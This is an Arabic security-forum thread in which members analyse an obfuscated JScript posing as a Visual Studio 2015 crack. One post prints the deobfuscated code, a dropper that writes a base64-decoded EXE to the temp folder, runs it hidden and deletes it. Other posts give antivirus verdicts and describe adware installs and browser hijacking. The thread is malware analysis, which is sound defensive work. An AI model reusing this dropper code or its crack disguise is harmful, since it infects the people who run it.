الحالة
مغلق و غير مفتوح للمزيد من الردود.

MagicianMiDo32

مراقب قسم الحماية ، خبراء زيزووم
طـــاقم الإدارة
★★ نجم المنتدى ★★
فريق فحص زيزووم للحماية
نجم الشهر
عضوية موثوقة ✔️
كبار الشخصيات
إنضم
29 أبريل 2012
المشاركات
9,235
مستوى التفاعل
27,160
النقاط
6,550
الإقامة
Egypt
الموقع الالكتروني
web.facebook.com
غير متصل
LBCgr20.gif




سلفل ياشباب ,,

اليوم وأنا ابحث عن حل لمشكلة الـ VisualStudio
العتية

poiuygf.webp



ياريت ياشباب الي عنده حل لهذة المشكلة يخبرني لأني بصراحة اتبضنت منها خالص وشكلي هسيب اللغة بحالها علشان خاطر الملل دا ,..

.,,

المهم ليقته بيقولي حمل سكريبت كدا وشغله والكراك هييجي

فجيت أشوف السيكريبت لقيته مشفر

قلت أحطه للشباب هنا يخبطوا فيه شوية


[hide]
infected
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

[/hide]
 

توقيع : MagicianMiDo32
تاكد من كلمة السر
 
الكاسبر بيقول تطبيق مستوى تهديد مرتفع
وضعه فى قيود صارمة
375672025.png

عملة له نعم اثق به
بعد عدة رسائل ظهر اى بى
439732632.png
 
توقيع : ALmehob
فك تشفيرة ملف الـ Java Script
[hide]
function decodeBase64(a) {
var b = new ActiveXObject("Microsoft.XMLDOM");
var c = b.createElement("tmp");
c.dataType = "bin.base64";
c.text = a;
return c.nodeTypedValue
}

function writeBytes(a, b) {
var c = 1;
var d = new ActiveXObject("ADODB.Stream");
d.Type = c;
d.Open();
d.Write(b);
d.SaveToFile(a)
}

function writeBase64FileInTemp(a, b) {
var c = 2;
var d = new ActiveXObject("Scripting.FileSystemObject");
var e = d.GetSpecialFolder(c) + "\\" + b;
writeBytes(e, decodeBase64(a));
return e
}

function deleteFile(a) {
var b = new ActiveXObject("Scripting.FileSystemObject");
b.DeleteFile(a)
}
var fname = 'VisualStudio2015FullCrack[LicenseActivator]FreeDownload.exe';
try {
var fpath = writeBase64FileInTemp(x, fname + "-" + new Date().getTime().toString() + ".exe");
var oShell = new ActiveXObject("WScript.Shell");
oErrCode = oShell.Run(fpath, 0, true);
deleteFile(fpath)
} catch (err) {};[/hide]​
 
توقيع : Abdulmuhaimen
واضح انه لتحميل ملف // داونلودر
 
توقيع : MagicianMiDo32
واضح انه لتحميل ملف // داونلودر

فعلا (y) , لو أنا شركة حماية كنت صنفت الملف على أنه

Java/TrojanDownloader

:tearsofjoy:
 
توقيع : Abdulmuhaimen
gj
(y):fistedhand:
 
توقيع : MagicianMiDo32
'طيب تجربتي البسيطة أنا

عند تشغيل السكريبت يتم تشغيل ملف تنفيذي غالبا يحويه هذا السكريبت
وهذا الملف عبارة عن داونلودر..

وأثناء عملية التنصيب تظهر أشياء هكذا .,
بضغطك التالي فإنك توافق على تنصيب برنامج البطة العرجاء
بضغطك التالي فإنك توافق على تنصيب برنامج الوزة العمياء

وانا نازي ديناي ديناي ديناي
المهم في الآخر تم تحميل ملف التفعيل
وطلع منتهي هو كمان :tearsofjoy:

ولاحظت تغيل الصفحة الرئيسية لمتصفح الكروم , كما أن البرنامج كان يقوم بقتل المتصفح أثناء تنصيبه ..

شسيبل.webp



زمنتالبؤ.webp
 
توقيع : MagicianMiDo32
اهلا ميدو
النود 9 يقول سليم بالفحص
وكذلك الكيهو بالفحص
 
توقيع : التميمي14
اخي التميمي متجرب التشغيل بعد اذنك طبعا .

والله اتمنى ان افعل ذلك لكن لا املك وهمي ولا استخدم برامج تجميد نهائيا لذلك اكتفى بذلك
ورمضان مبارك علينا وعليك
 
توقيع : التميمي14
مكتشف من النورتن بالتشغيل

m5zn_c2b9c4441a06cd5.png


m5zn_0c140c0f8b949f3.png


m5zn_c50740e73c6516e.png
 
توقيع : prooonet
ليس مكتشف من الافاست
 
توقيع : ahmed@salah
الحالة
مغلق و غير مفتوح للمزيد من الردود.
عودة
أعلى